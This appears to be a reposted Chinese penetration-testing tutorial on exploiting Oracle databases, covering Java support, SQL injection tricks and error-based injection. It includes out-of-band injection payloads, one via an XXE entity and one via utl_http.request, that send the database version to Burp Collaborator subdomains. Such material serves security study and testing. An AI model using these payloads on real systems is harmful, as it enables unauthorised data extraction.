Oracle 渗透利用（二）

gclome

原文链接：Oracle 渗透利用（二）


Oracle Java支持

在Oracle 8i之后，Oracle增加了对Java语言的支持，所以提供了Java池（可选，一个内存区域），用于存放Java代码、Java语句的语法分析表、Java语句的执行方案和Java虚拟机中的数据，以便进行Java程序开发。

既可以使用SQL语句从java源代码创建存储过程，也可以利用外部的class文件（java源代码文件、jar包）创建（既可以在SQL语句中加载，也可使用loadjava）。

drop java class "ExploitDecode"
要加引号，并且不能直接删除类，需要把引用它的内容先删除，这点与sql server的clr很相似

查看所有JAVA类
select * from DBA_JAVA_CLASSES
select * from USER_JAVA_CLASSES
select * from ALL_JAVA_CLASSES

Oracle CLR

通过PL/SQL调用外部的DLL来实现的存储过程

Oracle SQL 注入技巧
Oracle双引号通常被当做普通字符
进行注入测试时，通常只考虑单引号即可
​
​
    但是可以用来包裹字段名
​
Oracle注释符是-- 和/*
单行注释
​
多行注释，需要闭合
​
Oracle字符串连接符是||
​
​
​
​

oracle带外注入

oralce9i开始我们对oracle数据库进行攻击的时候通常需要确定数据库的版本，以便确定是否能进行进一步的利用，这里举一个带外查询数据库版本的例子，因为域名中不能出现特殊字符，所以需要进行编码，经过测试一个子域名最长是64个字节（猜测与dns服务器的具体实现有关，后边再看dns服务器具体实现对dns查询请求A记录名称长度的规定），但是select BANNER from v$version where rownum=1返回的第一条信息编码后的长度远超过64个字节，可以看出第三行数据比较短，但是oracle没有limit语句，就很不方便。
​
我们可以用这条语句达到同样的效果，因为我们只需要获取到版本即可
SELECT VERSION FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1
​
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT rawtohex(VERSION) FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1)||'.fl4oiu2as1pycr4g77lqjsk8yz4pse.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
​
​
进行其他操作同样需要考虑以上问题
也可以使用UTL_HTTP

select * from t_user where name='admin' || utl_http.request('http://'||(SELECT RAWTOHEX(VERSION) FROM PRODUCT_COMPONENT_VERSION where ROWNUM=1)||'.ujh1wgf4gp9zr79ra4270zdt7kda1z.burpcollaborator.net')
​
使用Oracle专属函数判断是否为Oracle数据库
to_char、to_number
​
​
支持科学计数法
​
​
使用instr替代like
instr函数，返回参数二在参数一中第一次出现的位置（从1开始）
​
报错注入
select * from t_user where name='admin' || dbms_xdb_version.checkin(user)
​


本章主要介绍了Oracle Java支持、Oracle CLR和Oracle SQL 注入技巧，下一章我们将介绍Oracle命令执行技巧和Oracle其他利用。